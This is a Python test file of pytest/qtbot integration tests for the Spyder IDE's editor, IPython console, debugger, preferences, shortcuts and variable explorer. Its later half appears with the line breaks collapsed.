@pytest.mark.skipif(not running_in_ci() or sys.platform.startswith('linux'),
                    reason="Only runs in CIs and fails on Linux sometimes")
def test_programmatic_custom_layouts(main_window, qtbot):
    """
    Test that a custom layout gets registered and it is recognized."""
    mw = main_window
    mw.first_spyder_run = False

    # Test layout registration
    layout_id = 'testing layout'

    # Test the testing plugin is being loaded
    mw.get_plugin('spyder_boilerplate')

    # Get the registered layout
    layout = mw.layouts.get_layout(layout_id)

    with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
        mw.layouts.quick_layout_switch(layout_id)

        qtbot.wait(500)

        for area in layout._areas:
            if area['visible']:
                for plugin_id in area['plugin_ids']:
                    if plugin_id not in area['hidden_plugin_ids']:
                        plugin = mw.get_plugin(plugin_id)
                        print(plugin)  # spyder: test-skip
                        try:
                            # New API
                            assert plugin.get_widget().isVisible()
                        except AttributeError:
                            # Old API
                            assert plugin.isVisible()


@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
    """Test that the file is saved before being run with runfile."""
    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    test_file_copy = test_file[:-3] + '_copy.py'
    shutil.copyfile(test_file, test_file_copy)
    main_window.editor.load(test_file_copy)
    code_editor = main_window.editor.get_focus_widget()

    # Verify result
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Type an unsaved assignment into the editor, then runfile it;
    # the value is only visible if the file was saved first
    qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
    filename = code_editor.filename
    with qtbot.waitSignal(shell.sig_prompt_ready):
        shell.execute('runfile("{}")'.format(remove_backslashes(filename)))

    assert shell.get_value('test_var') == 123
    main_window.editor.close_file()
    os.remove(test_file_copy)


@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
    """Test that file editor focus change updates pylint combobox filename."""
    pylint_plugin = main_window.get_plugin(Plugins.Pylint)

    # Show pylint plugin
    pylint_plugin.dockwidget.show()
    pylint_plugin.dockwidget.raise_()

    # Create base temporary directory
    basedir = tmpdir.mkdir('foo')

    # Open some files
    for idx in range(2):
        fh = basedir.join('{}.py'.format(idx))
        fname = str(fh)
        fh.write('print("Hello world!")')
        main_window.open_file(fh)
        qtbot.wait(200)
        assert fname == pylint_plugin.get_filename()

    # Create a editor split
    main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
    qtbot.wait(500)

    # Open other files
    for idx in range(4):
        fh = basedir.join('{}.py'.format(idx))
        fh.write('print("Hello world!")')
        fname = str(fh)
        main_window.open_file(fh)
        qtbot.wait(200)
        assert fname == pylint_plugin.get_filename()

    # Close split panel
    for editorstack in reversed(main_window.editor.editorstacks):
        editorstack.close_split()
        break
    qtbot.wait(1000)


@pytest.mark.slow
@flaky(max_runs=3)
def test_report_comms_error(qtbot, main_window):
    """Test if a comms error is correctly displayed."""
    CONF.set('main', 'show_internal_errors', True)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Create a bogus get_cwd so the comms call fails with an ImportError
    with qtbot.waitSignal(shell.executed):
        shell.execute('def get_cwd(): import foo')
    with qtbot.waitSignal(shell.executed):
        shell.execute("get_ipython().kernel.frontend_comm."
                      "register_call_handler('get_cwd', get_cwd)")
    with qtbot.waitSignal(shell.executed, timeout=3000):
        shell.execute('ls')

    qtbot.waitUntil(lambda: main_window.console.error_dialog is not None,
                    timeout=EVAL_TIMEOUT)
    error_dialog = main_window.console.error_dialog
    assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
    assert 'No module named' in error_dialog.error_traceback
    main_window.console.close_error_dialog()
    CONF.set('main', 'show_internal_errors', False)


@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
    """Test that we can set breakpoints while running."""
    # Create loop
    code = ("import time\n"
            "for i in range(100):\n"
            "    print(i)\n"
            "    time.sleep(0.1)\n"
            )
    p = tmpdir.join("loop_script.py")
    p.write(code)
    test_file = to_text_string(p)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Load test file
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Click the debug button
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)
    qtbot.wait(1000)

    # Continue debugging
    qtbot.keyClicks(shell._control, '!c')
    qtbot.keyClick(shell._control, Qt.Key_Enter)
    qtbot.wait(500)

    with qtbot.waitSignal(shell.executed):
        # Set a breakpoint while the loop is running
        # NOTE: 'toogle_breakpoint' is the actual (misspelled) API name
        code_editor.debugger.toogle_breakpoint(line_number=3)

    # We should drop into the debugger
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(shell._control, '!q')
        qtbot.keyClick(shell._control, Qt.Key_Enter)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()


# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
    """
    Open preferences dialog and select page with `section` (CONF_SECTION).

    Returns the (dialog, page index, page widget) tuple for the selected
    section.
    """
    main_window.show_preferences()
    preferences = main_window.preferences
    container = preferences.get_container()

    qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000)
    dlg = container.dialog
    index = dlg.get_index_by_name(section)
    page = dlg.get_page(index)
    dlg.set_current_index(index)
    return dlg, index, page


@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
    """
    Test for spyder-ide/spyder#13524 regression.

    Ensure the Run section exists.
    """
    assert preferences_dialog_helper(qtbot, main_window, 'run')


@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#10139 regression.

    Enabling codestyle/docstyle on the completion section of preferences,
    was not updating correctly.
    """
    # Reset config
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pydocstyle'),
             False)
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pycodestyle'),
             False)

    # Open completion prefences and update options
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'completions')
    # Get the correct tab pages inside the Completion preferences page
    tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]

    tabs = [(page.tabs.widget(i).layout().itemAt(0).widget(), i)
            for i in range(page.tabs.count())]

    tabs = dict(zip(tnames, tabs))
    tab_widgets = {
        'code style and formatting': 'code_style_check',
        'docstring style': 'docstring_style_check'
    }
    for tabname in tab_widgets:
        tab, idx = tabs[tabname]
        check_name = tab_widgets[tabname]
        check = getattr(tab, check_name)
        page.tabs.setCurrentIndex(idx)
        check.animateClick()
        qtbot.wait(500)
    dlg.ok_btn.animateClick()

    preferences = main_window.preferences
    container = preferences.get_container()

    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)

    # Check the menus are correctly updated
    count = 0
    for menu_item in main_window.source_menu_actions:
        if menu_item and isinstance(menu_item, QAction):
            print(menu_item.text(), menu_item.isChecked())

            if 'code style' in menu_item.text():
                assert menu_item.isChecked()
                count += 1
            elif 'docstring style' in menu_item.text():
                assert menu_item.isChecked()
                count += 1
    assert count == 2

    # Reset config
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pydocstyle'),
             False)
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pycodestyle'),
             False)


@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#10284 regression.

    Changing font resulted in error.
    """
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'appearance')
    for fontbox in [page.plain_text_font.fontbox,
                    page.rich_text_font.fontbox]:
        fontbox.setFocus()
        idx = fontbox.currentIndex()
        fontbox.setCurrentIndex(idx + 1)
    dlg.ok_btn.animateClick()

    preferences = main_window.preferences
    container = preferences.get_container()

    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)


@pytest.mark.slow
@pytest.mark.skipif(
    not sys.platform.startswith('linux'),
    reason="Changes of Shitf+Return shortcut cause an ambiguous shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#12992 regression.

    Overwriting shortcuts results in a shortcuts conflict.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Setup shortcuts (set run cell and advance shortcut to run selection)
    base_run_cell_advance = CONF.get_shortcut(
        'editor', 'run cell and advance')  # Should be Shift+Return
    base_run_selection = CONF.get_shortcut(
        'editor', 'run selection')  # Should be F9
    assert base_run_cell_advance == 'Shift+Return'
    assert base_run_selection == 'F9'

    CONF.set_shortcut(
        'editor', 'run cell and advance', '')
    CONF.set_shortcut(
        'editor', 'run selection', base_run_cell_advance)
    main_window.shortcuts.apply_shortcuts()

    # Check execution of shortcut
    # Create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(u'print(0)\nprint(ññ)')

    # Shift+Return now runs the *selection*, so only the first line runs
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return,
                       modifier=Qt.ShiftModifier)
    qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
    assert u'ññ' not in shell._control.toPlainText()

    # Reset shortcuts
    CONF.set_shortcut(
        'editor', 'run selection', 'F9')
    CONF.set_shortcut(
        'editor', 'run cell and advance', 'Shift+Return')
    main_window.shortcuts.apply_shortcuts()

    qtbot.wait(500)  # Wait for shortcut change to actually be applied

    # Check shortcut run cell and advance reset
    code_editor.setFocus()
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return,
                       modifier=Qt.ShiftModifier)
    qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())


@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#11132 regression.

    Resetting shortcut resulted in error.
    """
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'shortcuts')
    page.reset_to_default(force=True)
    dlg.ok_btn.animateClick()

    preferences = main_window.preferences
    container = preferences.get_container()

    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)


@pytest.mark.slow
@pytest.mark.order(1)
def test_preferences_change_interpreter(qtbot, main_window):
    """Test that on main interpreter change signal is emitted."""
    # Check original pyls configuration
    lsp = main_window.completions.get_provider('lsp')
    config = lsp.generate_python_config()
    jedi = config['configurations']['pylsp']['plugins']['jedi']
    assert jedi['environment'] is None
    assert jedi['extra_paths'] == []

    # Change main interpreter on preferences
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'main_interpreter')
    page.cus_exec_radio.setChecked(True)
    page.cus_exec_combo.combobox.setCurrentText(sys.executable)

    with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
                          timeout=5000, raising=True):
        dlg.ok_btn.animateClick()

    # Check updated pyls configuration
    config = lsp.generate_python_config()
    jedi = config['configurations']['pylsp']['plugins']['jedi']
    assert jedi['environment'] == sys.executable
    assert jedi['extra_paths'] == []


@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
    # Test that the last page is updated on re open
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'main_interpreter')
    preferences = main_window.preferences
    container = preferences.get_container()

    qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000)
    dlg.ok_btn.animateClick()
    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)

    main_window.show_preferences()
    qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000)
    dlg = container.dialog
    assert dlg.get_current_index() == index
    dlg.ok_btn.animateClick()
    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="It times out too much on Windows and macOS") def test_go_to_definition(main_window, qtbot, capsys): """Test that go-to-definition works as expected.""" # --- Code that gives no definition code_no_def = dedent(""" from qtpy.QtCore import Qt Qt.FramelessWindowHint""") # Create new editor with code and wait until LSP is ready main_window.editor.new(text=code_no_def) code_editor = main_window.editor.get_focus_widget() with qtbot.waitSignal( code_editor.completions_response_signal, timeout=30000): code_editor.document_did_open() # Move cursor to the left one character to be next to # FramelessWindowHint code_editor.move_cursor(-1) with qtbot.waitSignal( code_editor.completions_response_signal): code_editor.go_to_definition_from_cursor() # Capture stderr and assert there are no errors sys_stream = capsys.readouterr() assert sys_stream.err == u'' # --- Code that gives definition code_def = "import qtpy.QtCore" # Create new editor with code and wait until LSP is ready main_window.editor.new(text=code_def) code_editor = main_window.editor.get_focus_widget() with qtbot.waitSignal( code_editor.completions_response_signal, timeout=30000): code_editor.document_did_open() # Move cursor to the left one character to be next to QtCore code_editor.move_cursor(-1) with qtbot.waitSignal( code_editor.completions_response_signal): code_editor.go_to_definition_from_cursor() def _get_filenames(): return [osp.basename(f) for f in main_window.editor.get_filenames()] qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames()) assert 'QtCore.py' in _get_filenames() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin' and not PY2, reason="It times out on macOS/PY3") def test_debug_unsaved_file(main_window, qtbot): """Test that we can debug an unsaved file.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() 
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables control = shell._control debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text('print(0)\nprint(1)\nprint(2)') # Set breakpoint code_editor.debugger.toogle_breakpoint(line_number=2) qtbot.wait(500) # Start debugging qtbot.mouseClick(debug_button, Qt.LeftButton) # There is a breakpoint, so it should continue qtbot.waitUntil( lambda: '!continue' in shell._control.toPlainText()) qtbot.waitUntil( lambda: "1---> 2 print(1)" in control.toPlainText()) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize( "debug", [True, False]) def test_runcell(main_window, qtbot, tmpdir, debug): """Test the runcell command.""" # Write code with a cell to a file code = u"result = 10; fname = __file__" p = tmpdir.join("cell-test.py") p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) if debug: function = 'debugcell' else: function = 'runcell' # Execute runcell with qtbot.waitSignal(shell.executed): shell.execute(function + u"(0, r'{}')".format(to_text_string(p))) if debug: # Reach the 'name' input shell.pdb_execute('!c') qtbot.wait(1000) # Verify that the `result` variable is defined assert shell.get_value('result') == 10 # Verify that the `fname` variable is `cell-test.py` assert "cell-test.py" in shell.get_value('fname') # Verify that the `__file__` variable is undefined try: shell.get_value('__file__') assert False except KeyError: pass @pytest.mark.slow @flaky(max_runs=3) def test_runcell_leading_indent(main_window, qtbot, tmpdir): """Test the runcell command with leading indent.""" # Write code 
with a cell to a file code = ("def a():\n return\nif __name__ == '__main__':\n" "# %%\n print(1233 + 1)\n") p = tmpdir.join("cell-test.py") p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Execute runcell with qtbot.waitSignal(shell.executed): shell.execute("runcell(1, r'{}')".format(to_text_string(p))) assert "1234" in shell._control.toPlainText() assert "This is not valid Python code" not in shell._control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) def test_varexp_rename(main_window, qtbot, tmpdir): """ Test renaming a variable. Regression test for spyder-ide/spyder#10735 """ # ---- Setup ---- p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py")) filepath = to_text_string(p) shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath) # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file main_window.editor.load(filepath) # Move to the editor's first line code_editor = main_window.editor.get_focus_widget() code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier) # Get a reference to the namespace browser widget nsb = main_window.variableexplorer.current_widget() # ---- Run file ---- with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_F5) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Rename one element nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0)) nsb.editor.rename_item(new_name='arr2') # Wait until all objects have updated in the variable explorer def data(cm, i, j): return cm.data(cm.index(i, j)) qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2', timeout=EVAL_TIMEOUT) assert data(nsb.editor.model, 0, 
0) == 'a' assert data(nsb.editor.model, 1, 0) == 'arr2' assert data(nsb.editor.model, 2, 0) == 'li' assert data(nsb.editor.model, 3, 0) == 's' # ---- Run file again ---- with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_F5) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5, timeout=EVAL_TIMEOUT) assert data(nsb.editor.model, 0, 0) == 'a' assert data(nsb.editor.model, 1, 0) == 'arr' assert data(nsb.editor.model, 2, 0) == 'arr2' assert data(nsb.editor.model, 3, 0) == 'li' assert data(nsb.editor.model, 4, 0) == 's' @pytest.mark.slow @flaky(max_runs=3) def test_varexp_remove(main_window, qtbot, tmpdir): """ Test removing a variable. Regression test for spyder-ide/spyder#10709 """ # ---- Setup ---- p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py")) filepath = to_text_string(p) shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath) # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file main_window.editor.load(filepath) # Move to the editor's first line code_editor = main_window.editor.get_focus_widget() code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier) # Get a reference to the namespace browser widget nsb = main_window.variableexplorer.current_widget() # ---- Run file ---- with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_F5) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Remove one element nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0)) nsb.editor.remove_item(force=True) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3, timeout=EVAL_TIMEOUT) def data(cm, i, j): assert cm.rowCount() == 3 return 
cm.data(cm.index(i, j)) assert data(nsb.editor.model, 0, 0) == 'a' assert data(nsb.editor.model, 1, 0) == 'li' assert data(nsb.editor.model, 2, 0) == 's' @pytest.mark.slow @flaky(max_runs=3) def test_varexp_refresh(main_window, qtbot): """ Test refreshing the variable explorer while the kernel is executing. """ # Create object shell = main_window.ipyconsole.get_current_shellwidget() control = main_window.ipyconsole.get_widget().get_focus_widget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) shell.execute("import time\n" "for i in range(10):\n" " print('i = {}'.format(i))\n" " time.sleep(.1)\n") qtbot.waitUntil(lambda: "i = 0" in control.toPlainText()) qtbot.wait(300) # Get value object nsb = main_window.variableexplorer.current_widget() # This is empty assert len(nsb.editor.source_model._data) == 0 nsb.refresh_table() qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1) assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS") def test_runcell_edge_cases(main_window, qtbot, tmpdir): """ Test if runcell works with an unnamed cell at the top of the file and with an empty cell. 
""" # Write code with a cell to a file code = ('if True:\n' ' a = 1\n' '#%%') p = tmpdir.join("test.py") p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) code_editor = main_window.editor.get_focus_widget() # call runcell with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(1000) assert 'runcell(0' in shell._control.toPlainText() assert 'cell is empty' not in shell._control.toPlainText() with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) assert 'runcell(1' in shell._control.toPlainText() assert 'Error' not in shell._control.toPlainText() assert 'cell is empty' in shell._control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) def test_runcell_pdb(main_window, qtbot): """Test the runcell command in pdb.""" # Write code with a cell to a file code = ("if 'abba' in dir():\n" " print('abba {}'.format(abba))\n" "else:\n" " def foo():\n" " abba = 27\n" " foo()\n") # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) # Start debugging with qtbot.waitSignal(shell.executed, timeout=10000): qtbot.mouseClick(debug_button, Qt.LeftButton) for key in ['!n', '!n', '!s', '!n', '!n']: with qtbot.waitSignal(shell.executed): qtbot.keyClicks(shell._control, key) qtbot.keyClick(shell._control, Qt.Key_Enter) assert shell.get_value('abba') == 27 code_editor.setFocus() # call runcell 
with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) assert "runcell" in shell._control.toPlainText() # Make sure the local variables are detected assert "abba 27" in shell._control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize( "debug", [False, True]) def test_runcell_cache(main_window, qtbot, debug): """Test the runcell command cache.""" # Write code with a cell to a file code = ("import time\n" "time.sleep(.5)\n" "# %%\n" "print('Done')\n") # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) if debug: # Start debugging with qtbot.waitSignal(shell.executed): shell.execute("%debug print()") # Run the two cells code_editor.setFocus() code_editor.move_cursor(0) qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(100) qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(500) qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText()) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="Works reliably on Linux") def test_path_manager_updates_clients(qtbot, main_window, tmpdir): """Check that on path manager updates, consoles correctly update.""" main_window.show_path_manager() dlg = main_window._path_manager test_folder = 'foo-spam-bar-123' folder = str(tmpdir.mkdir(test_folder)) dlg.add_path(folder) qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT) with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT): dlg.button_ok.animateClick() cmd = 'import sys;print(sys.path)' # Check Spyder is updated main_window.console.execute_lines(cmd) syspath = main_window.console.get_sys_path() assert folder in syspath # 
Check clients are updated count = 0 for client in main_window.ipyconsole.get_clients(): shell = client.shellwidget if shell is not None: syspath = shell.execute(cmd) control = shell._control # `shell.executed` signal was not working so we use waitUntil qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(), timeout=EVAL_TIMEOUT) assert test_folder in control.toPlainText() count += 1 assert count >= 1 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin', reason="It times out on macOS and Windows") def test_pdb_key_leak(main_window, qtbot, tmpdir): """ Check that pdb notify spyder doesn't call QApplication.processEvents(). If it does there might be keystoke leakage. see #10834 """ # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = shell._control # Write code to a file code1 = ("def a():\n" " 1/0") code2 = ("from tmp import a\n" "a()") folder = tmpdir.join('tmp_folder') test_file = folder.join('tmp.py') test_file.write(code1, ensure=True) test_file2 = folder.join('tmp2.py') test_file2.write(code2) # Run tmp2 and get an error with qtbot.waitSignal(shell.executed): shell.execute('runfile("' + str(test_file2).replace("\\", "/") + '", wdir="' + str(folder).replace("\\", "/") + '")') assert '1/0' in control.toPlainText() # Replace QApplication.processEvents to make sure it is not called super_processEvents = QApplication.processEvents def processEvents(): processEvents.called = True return super_processEvents() processEvents.called = False try: QApplication.processEvents = processEvents # Debug and open both files with qtbot.waitSignal(shell.executed): shell.execute('%debug') with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!u') qtbot.keyClick(control, Qt.Key_Enter) # Wait until both files are open qtbot.waitUntil( lambda: osp.normpath(str(test_file)) in [ osp.normpath(p) for p 
in main_window.editor.get_filenames()]) qtbot.waitUntil( lambda: str(test_file2) in [ osp.normpath(p) for p in main_window.editor.get_filenames()]) # Make sure the events are not processed. assert not processEvents.called finally: QApplication.processEvents = super_processEvents @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS") @pytest.mark.parametrize( "where", [True, False]) def test_pdb_step(main_window, qtbot, tmpdir, where): """ Check that pdb notify Spyder only moves when a new line is reached. """ # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = shell._control # Write code to a file code1 = ("def a():\n" " 1/0") code2 = ("from tmp import a\n" "a()") folder = tmpdir.join('tmp_folder') test_file = folder.join('tmp.py') test_file.write(code1, ensure=True) test_file2 = folder.join('tmp2.py') test_file2.write(code2) # Run tmp2 and get an error with qtbot.waitSignal(shell.executed): shell.execute('runfile("' + str(test_file2).replace("\\", "/") + '", wdir="' + str(folder).replace("\\", "/") + '")') qtbot.wait(1000) assert '1/0' in control.toPlainText() # Debug and enter first file with qtbot.waitSignal(shell.executed): shell.execute('%debug') qtbot.waitUntil( lambda: osp.samefile( main_window.editor.get_current_editor().filename, str(test_file))) # Move to another file main_window.editor.new() qtbot.wait(100) assert main_window.editor.get_current_editor().filename != str(test_file) current_filename = main_window.editor.get_current_editor().filename # Run a random command, make sure we don't move with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!a') qtbot.keyClick(control, Qt.Key_Enter) qtbot.wait(1000) assert current_filename == main_window.editor.get_current_editor().filename # Go up and enter second file with qtbot.waitSignal(shell.executed): 
qtbot.keyClicks(control, '!u') qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: osp.samefile( main_window.editor.get_current_editor().filename, str(test_file2))) # Go back to first file editor_stack = main_window.editor.get_current_editorstack() index = editor_stack.has_filename(str(test_file)) assert index is not None editor_stack.set_stack_index(index) assert osp.samefile( main_window.editor.get_current_editor().filename, str(test_file)) if where: # go back to the second file with where with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!w') qtbot.keyClick(control, Qt.Key_Enter) qtbot.wait(1000) # Make sure we moved assert osp.samefile( main_window.editor.get_current_editor().filename, str(test_file2)) else: # Stay at the same place with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!a') qtbot.keyClick(control, Qt.Key_Enter) qtbot.wait(1000) # Make sure we didn't move assert osp.samefile( main_window.editor.get_current_editor().filename, str(test_file)) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="Fails sometimes on macOS") def test_runcell_after_restart(main_window, qtbot): """Test runcell after a kernel restart.""" # Write code to a file code = "print('test_runcell_after_restart')" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) # Restart Kernel with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000): shell.ipyclient.restart_kernel() # call runcell code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.waitUntil( lambda: "test_runcell_after_restart" in shell._control.toPlainText()) # Make sure no errors are shown assert "error" not in shell._control.toPlainText().lower() 
